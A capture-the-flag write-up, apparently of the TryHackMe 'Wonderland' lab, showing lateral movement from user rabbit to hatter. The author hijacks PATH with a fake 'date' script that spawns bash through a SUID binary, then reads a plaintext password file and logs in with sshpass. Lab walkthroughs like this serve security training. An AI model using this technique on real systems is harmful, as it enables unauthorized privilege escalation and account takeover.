Path Hijacking
A SUID binary was suspected vulnerable as it calls another binary, date, without its absolute path, rendering it vulnerable to thePath_Hijacking attack
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binprepending the home directory of the rabbit user into the $PATH variable
rabbit@wonderland:/home/rabbit$ cat date
#!/usr/bin/env bash
/bin/bashCreating a “fake” date binary
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$ whoami
hatter
hatter@wonderland:/home/rabbit$ hostname
wonderland
hatter@wonderland:/home/rabbit$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:a9:f1:ea:f3:b7 brd ff:ff:ff:ff:ff:ff
inet 10.10.35.235/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 1752sec preferred_lft 1752sec
inet6 fe80::a9:f1ff:feea:f3b7/64 scope link
valid_lft forever preferred_lft foreverLateral Movement made to the hatter user via thePath_Hijacking attack
SSH
hatter@wonderland:/home/hatter$ ll
total 36
drwxr-x--- 5 hatter hatter 4096 Aug 28 15:45 ./
drwxr-xr-x 6 root root 4096 May 25 2020 ../
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter 220 May 25 2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25 2020 .bashrc
drwx------ 2 hatter hatter 4096 Aug 28 15:45 .cache/
drwx------ 3 hatter hatter 4096 Aug 28 15:45 .gnupg/
drwxrwxr-x 3 hatter hatter 4096 May 25 2020 .local/
-rw-r--r-- 1 hatter hatter 807 May 25 2020 .profile
-rw------- 1 hatter hatter 29 May 25 2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
WhyIsARavenLikeAWritingDesk?There appears to be the password for the hatter user; WhyIsARavenLikeAWritingDesk?
┌──(kali㉿kali)-[~/archive/thm/wonderland]
└─$ sshpass -p 'WhyIsARavenLikeAWritingDesk?' ssh hatter@$IP
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Aug 28 15:45:20 UTC 2024
System load: 0.0 Processes: 99
Usage of /: 18.9% of 19.56GB Users logged in: 1
Memory usage: 64% IP address for eth0: 10.10.35.235
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
hatter@wonderland:~$ whoami
hatter
hatter@wonderland:~$ hostname
wonderland
hatter@wonderland:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:a9:f1:ea:f3:b7 brd ff:ff:ff:ff:ff:ff
inet 10.10.35.235/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 3583sec preferred_lft 3583sec
inet6 fe80::a9:f1ff:feea:f3b7/64 scope link
valid_lft forever preferred_lft foreverSSH